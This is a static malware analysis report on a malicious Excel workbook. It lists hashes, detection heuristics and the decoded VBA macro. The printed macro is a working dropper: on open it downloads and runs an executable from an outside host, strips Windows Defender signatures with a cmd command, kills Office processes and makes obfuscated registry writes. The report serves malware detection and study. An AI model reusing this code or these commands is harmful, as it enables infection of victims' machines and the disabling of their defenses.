Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 358a60ba99153e24…

MALICIOUS

Office (OOXML)

20.9 KB
Created: 2006-09-16 00:00:00 UTC
Authoring application: Microsoft Excel 12.0000
First seen: 2021-02-23
MD5: 80e4e06cb7ca424b0915ca7c3c0c839e
SHA-1: 3b49b30a85cb64ce871a6176b976d55fad68dab6
SHA-256: 358a60ba99153e244732fbdb8992865053a0c969a9892abdf96568147612a332
Risk Score: 510

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 8 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (ETJBuhLeL(bFiJlSB8k("è‹CŸõÃ57514750517A7257404A4;417A5154414:4D51564G47550G475:47", "PYrSGYbFx")))
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set tskkills = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    .write xHttp.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Dim xHttp: Set xHttp = CreateObject(ETJBuhLeL(bFiJlSB8k("`âf§vM704D514D44560G7:6F6A6:767672", "Ix8GibZ4z")))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim xHttp: Set xHttp = CreateObject(ETJBuhLeL(bFiJlSB8k("`âf§vM704D514D44560G7:6F6A6:767672", "Ix8GibZ4z")))
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://stemtopx.com/work/5.exe Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 22033 bytes
SHA-256: 058b1c20a10f953a1d23bf1201adb32ab7c90fa1e5d92e5b76a534b50e2d3993
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub tfastgdyugsuf()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim xHttp: Set xHttp = CreateObject(ETJBuhLeL(bFiJlSB8k("`âf§vM704D514D44560G7:6F6A6:767672", "Ix8GibZ4z")))
Dim bStrm: Set bStrm = CreateObject(ETJBuhLeL(bFiJlSB8k("ÂÁÖô¶F46400G71565047434F", "AQOH6ke2r")))
xHttp.Open "GET", "http://stemtopx.com/work/5.exe", False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile ETJBuhLeL(bFiJlSB8k("è‹CŸõÃ57514750517A7257404A4;417A5154414:4D51564G47550G475:47", "PYrSGYbFx")), 2 '
End With
Shell (ETJBuhLeL(bFiJlSB8k("è‹CŸõÃ57514750517A7257404A4;417A5154414:4D51564G47550G475:47", "PYrSGYbFx")))
Set defender = CreateObject(ETJBuhLeL(bFiJlSB8k("›W‹³61504;52560G714:474A4A", "R31evr5K9")))
Dim Start
Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit"
defender.Run Start, vbHide
Set tskkills = CreateObject("WScript.Shell")
Dim STArTkwZkills
STArTkwZkills = "cmd /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit"
tskkills.Run STArTkwZkills, vbHide
Set wso = CreateObject(ETJBuhLeL(bFiJlSB8k("›W‹³61504;52560G714:474A4A", "R31evr5K9")))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("l–Tü´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "xsxFElisg")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÂÈÔ‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "LuXXJjiSt")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("¦ zÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "C2j5sVMzx")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("è€Dœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "t8DFUoGej")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("”xJB61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "B05ls9Rxz")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("è€Dœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "CN4Mk1AWY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ZæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "kFYqShidu")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" Vê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "L12Z61XJE")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ˆ@Ú¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "kNI0IRIKx")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("( Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "V4H4yZWyG")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("šXŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "LVnSXqC7x")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" Vê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "WROmgMHYL")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" Vê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "VLYzx1kj7")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("œhª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "dkcg2YPVB")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" ^úâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "jxAaFaFqL")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("î€Dœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "PfaW5IkV1")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" fŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "UZ1gsg7mb")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" fŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "yiORlLOTp")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(". Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "h5GFnr3qC")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("”xJB61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "hxm6t08wi")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("”xJB61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "pei5HeYp2")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("<6*|J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "uTfV4KmOY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("l–Tü´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "vjjOLIXzy")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("tF4@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "gLThyo2Yf")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" vª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "nB2wQ7fTY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("DæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "kNSwWKz2I")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ä˜t<41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "f3XN5vmIk")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ZæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "ceafMwdwW")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ü¨ |J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "x113Ods39")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("’hª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "kxjT7tuCj")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("Rö” J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "ApDp8q9nV")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" NÚ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "tEKzNeYme")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("æ�dÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "EeYaIlCxX")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ŒHê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "ctbXRAqBZ")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÈÀÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "GK7UhDbQk")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("’hª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "UfqUNNJg8")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("\ö” J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "Dh0Esbczo")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("tF4@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "uheuC0eh3")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("¼(*|J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "YBsSh4XVU")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("HÎÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "TGtgRRqgD")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("nŽDœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "TbMgo2YGr")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("Òè” J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "DDHQkiy1K")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("( Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "VPKYhBoq5")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("@ÞäâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "YZsvodgLN")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("|¶ |J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "vpKxVRoMY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("´86@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "a7CxcWILc")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("FÞäâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "CwIA6PQop")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("d¦t<41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "S3KRrCbqi")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("& zÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "sRJikuUPH")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("4:6@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "VUywFZT0P")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÚØôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "ygJAUeAVp")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("HÎÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "EV0cXCXra")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("x®  г577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "zDZbxzi7n")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÈÀÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "VRM1qi6pt")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" vª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "SxOkr5sOY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÆÐäâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "caznoKmHA")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("DæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "tJv3adPVi")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ZæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "NT9PkrKxY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("DæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "gXnZVtJu3")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("  zÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "qyoCDB81S")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("Џ4@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "hv0q3qI6R")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(". Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "FEgdbiCDL")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("NÎÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "Q2g4mLqFr")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("€PúâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "rp3G0CAU7")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("šXŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "kIPorLm22")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
End Sub
Public Function ETJBuhLeL(ByVal HqtxDJMeY As String)
Dim IFctgq1Z1 As Long, MYPFllgV2 As String, nn4twvlYf As String
    On Local Error Resume Next
    For IFctgq1Z1 = 1 To Len(HqtxDJMeY) Step 2
        MYPFllgV2 = MYPFllgV2 & Chr$(Val(bFiJlSB8k("ž8", "SpuMxLdt5") & Mid$(HqtxDJMeY, IFctgq1Z1, 2)))
    Next IFctgq1Z1
    ETJBuhLeL = MYPFllgV2
End Function
Public Function bFiJlSB8k(ByVal CrMcSviMY As String, ByVal CglbOe0H1 As String) As String
On Error Resume Next
Dim k7Sc8zGx2(0 To 255) As Integer, IFctgq1Z1 As Integer, third As Long, fourth() As Byte
fourth() = StrConv(CglbOe0H1, vbFromUnicode)
For IFctgq1Z1 = 0 To 255
    third = (third + k7Sc8zGx2(IFctgq1Z1) + fourth(IFctgq1Z1 Mod Len(CglbOe0H1))) Mod 256
    k7Sc8zGx2(IFctgq1Z1) = IFctgq1Z1
Next IFctgq1Z1
